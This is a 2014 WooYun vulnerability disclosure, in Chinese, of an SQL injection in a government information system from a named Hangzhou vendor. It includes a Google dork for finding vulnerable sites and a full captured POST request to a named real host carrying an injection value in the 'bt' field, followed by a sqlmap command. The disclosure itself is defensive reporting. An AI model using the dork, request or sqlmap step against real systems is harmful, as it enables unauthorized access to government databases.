当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061570

漏洞标题:某通用政府信息系统存在SQL注入漏洞

相关厂商:杭州建易建设信息技术有限公司

漏洞作者: 【|→上善若水】

提交时间:2014-05-20 18:29

修复时间:2014-08-18 18:32

公开时间:2014-08-18 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-25: 厂商已经确认,细节仅向厂商公开
2014-05-28: 细节向第三方安全合作伙伴开放
2014-07-19: 细节向核心白帽子及相关领域专家公开
2014-07-29: 细节向普通白帽子公开
2014-08-08: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

某通用政府信息系统存在SQL注入漏洞

详细说明:

google:
inurl:/web_news/DownClassList.aspx
表单中变量存在POST注入。
抓包并保存为txt:

POST /web_news/DownClassList.aspx?news_bigclass=8&ProType=17&ViewID=197 HTTP/1.1
Host: www.xszbjyw.com:82
Proxy-Connection: keep-alive
Content-Length: 2609
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.xszbjyw.com:82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xszbjyw.com:82/web_news/DownClassList.aspx?news_bigclass=8&ProType=17&ViewID=197
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: ASP.NET_SessionId=torghg45nznv4cvyxj503eq5
__VIEWSTATE=%2FwEPDwUKMTc0Nzg3ODI2Nw9kFgICAw9kFgQCAQ8PFgIeBFRleHQFM%2BmmlumhtSA%2BIOe9keS4iuacjeWKoSA%2BIOi1hOaWmeS4i%2Bi9vSA%2BIOaUv%2BW6nOmHh%2Bi0rWRkAgcPPCsADQEADxYOHgpEQkNvbm5OYW1lBQRNYWluHgtfIURhdGFCb3VuZGceC1JlY29yZENvdW50AgweCkRhdGFNZW1iZXIFBnRhYmxlMR4LXyFJdGVtQ291bnQCDB4KUGFnZXNDb3VudAICHgZTcWxTdHIFoQIgc2VsZWN0IE5ld3NfYmlnY2xhc3MsTmV3c19pZCxuZXdzX2VudGVydGltZSxOZXdzX3RpdGxlLHpseHp1cmwgIGZyb20gd2ViX25ld3MgIHdoZXJlIG5ld3NfYmlnY2xhc3M9OCBhbmQgTmV3c19sb2NhbD0n5pys57qnJyBhbmQgbmV3c19seD0xNyBhbmQgUHVibGlzaFN0YXJ0VGltZTw9Z2V0ZGF0ZSgpICBhbmQgKG5ld3NfZW5kdGltZSBpcyBudWxsIG9yIG5ld3NfZW5kdGltZT49Z2V0ZGF0ZSgpKSBhbmQgc2ZmYj0n5pivJyBhbmQgSVNkZWxldGU9MCAgb3JkZXIgYnkgUHVibGlzaFN0YXJ0VGltZSBkZXNjZBYCZg9kFhpmDw8WAh4HVmlzaWJsZWhkZAIBD2QWBGYPZBYCZg8VAhkxNDA1MDcxMTE4MDQ5MjkyMzAyMDguZG9jJ%2BWIhuaVo%2B%2B8iOiHquihjOaLm%2Bagh%2B%2B8iemHh%2Bi0reWkh%2BahiOihqGQCAQ8PFgIfAAUKMjAxNC0wNS0wN2RkAgIPZBYEZg9kFgJmDxUCGTE0MDUwNzExMTgyODM4MDQzMDcyMC5kb2Mt5YiG5pWj77yI6Ieq6KGM5oub5qCH77yJ6YeH6LSt6LSn54mp6aqM5pS25Y2VZAIBDw8WAh8ABQoyMDE0LTA1LTA3ZGQCAw9kFgRmD2QWAmYPFQIZMTQwMzI4MDE1MjExNjA2NTE5OTY4LmRvYyflhbPkuo7ovaznvZHkuIrnq57ku7fkv53or4Hph5HnmoTmiqXlkYpkAgEPDxYCHwAFCjIwMTQtMDMtMjhkZAIED2QWBGYPZBYCZg8VAhkxNDAzMjEwOTEwMDc5MTkxMjc2NDguZG9jG%2BaUv%2BW6nOmHh%2Bi0reWnlOaJmOWNj%2BiuruS5pmQCAQ8PFgIfAAUKMjAxNC0wMy0yMWRkAgUPZBYEZg9kFgJmDxUCGTE0MDMyMDAzMzAwODQyMTQyODY3Mi5kb2Mk6YeH6LSt5Y2V5L2N5oql5a6h6Z2e5a6a54K56aWt5bqX55SoZAIBDw8WAh8ABQoyMDE0LTAzLTIwZGQCBg9kFgRmD2QWAmYPFQIbMTQwMTIyMDEyNjM4NzIyODI2MjY1NjAuZG9jGTIwMTTlubTlip7lhazlrrblhbfmmI7nu4ZkAgEPDxYCHwAFCjIwMTQtMDEtMjJkZAIHD2QWBGYPZBYCZg8VAhkxMzEwMTQxMjQwMzY3MTEyNDIxOTcucmFyHuaUv%2BW6nOmbhuS4remHh%2Bi0reacjeWKoeaJi%2BWGjGQCAQ8PFgIfAAUKMjAxMy0xMC0xNGRkAggPZBYEZg9kFgJmDxUCGjEzMDkwNTAyMDQxODkxODIzNDUwODguZG9jOOiQp%2BaLm%2BeuoeWKnu%2B8iDIwMTPvvIkz5Y%2B377yI5a6a54K56aWt5bqX5pyA57uI5paH5Lu277yJZAIBDw8WAh8ABQoyMDEzLTA5LTA1ZGQCCQ9kFgRmD2QWAmYPFQIaMTMwODE0MDMwNTUzMjI3MzIwMTIxNi5kb2MfMjAxM%2BW5tOaVmeiCsuezu%2Be7n%2BiuvuWkh%2Ba4heWNlWQCAQ8PFgIfAAUKMjAxMy0wOC0xNGRkAgoPZBYEZg9kFgJmDxUCGTEzMDczMTAyNDQwMjE2MzUyMDk5Mi5kb2Me5pS%2F5bqc6YeH6LSt6YCA5L%2Bd6K%2BB6YeR6K%2BB5piOZAIBDw8WAh8ABQoyMDEzLTA3LTMxZGQCCw8PFgIfCGhkZAIMD2QWAmYPZBYCAgwPD2QWAh4JT25LZXlEb3duBXRqYXZhc2NyaXB0OiBpZiAoZXZlbnQua2V5Q29kZT09MTMpIHtkb2N1bWVudC5hbGwuR3JpZFZpZXdlcjFfY3RsMTNfQnRuR290by5mb2N1cygpOyBldmVudC5rZXlDb2RlPTEzOyByZXR1cm4gdHJ1ZTsgfWQYAQULR3JpZFZpZXdlcjEPPCsACgEIAgJkw6Hwjf2oxubEztB4ZN5OXtpYjHM%3D&__EVENTVALIDATION=%2FwEWCQKa1qKeDgK%2B79rvDALq5Ji9BgL1lKqEDQLWoLboCQLiucnTDgLO3qSVBwL6%2FJG6DALbwuKQCrW4OTEFOheKfVh8U%2B1dffyqCavV&bt=%25%27&btnSeach=%E6%9F%A5%E8%AF%A2&GridViewer1%24ctl13%24NumGoto=1


漏洞证明:

sqlmap.py -r data.txt

33.jpg


333.jpg

修复方案:

过滤

版权声明:转载请注明来源 【|→上善若水】@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-25 14:34

厂商回复:

CNVD确认并复现所述情况,转由CNCERT下发浙江分中心,联系受影响政府部门和软件生产厂商处置。

最新状态:

暂无


漏洞评价:

评论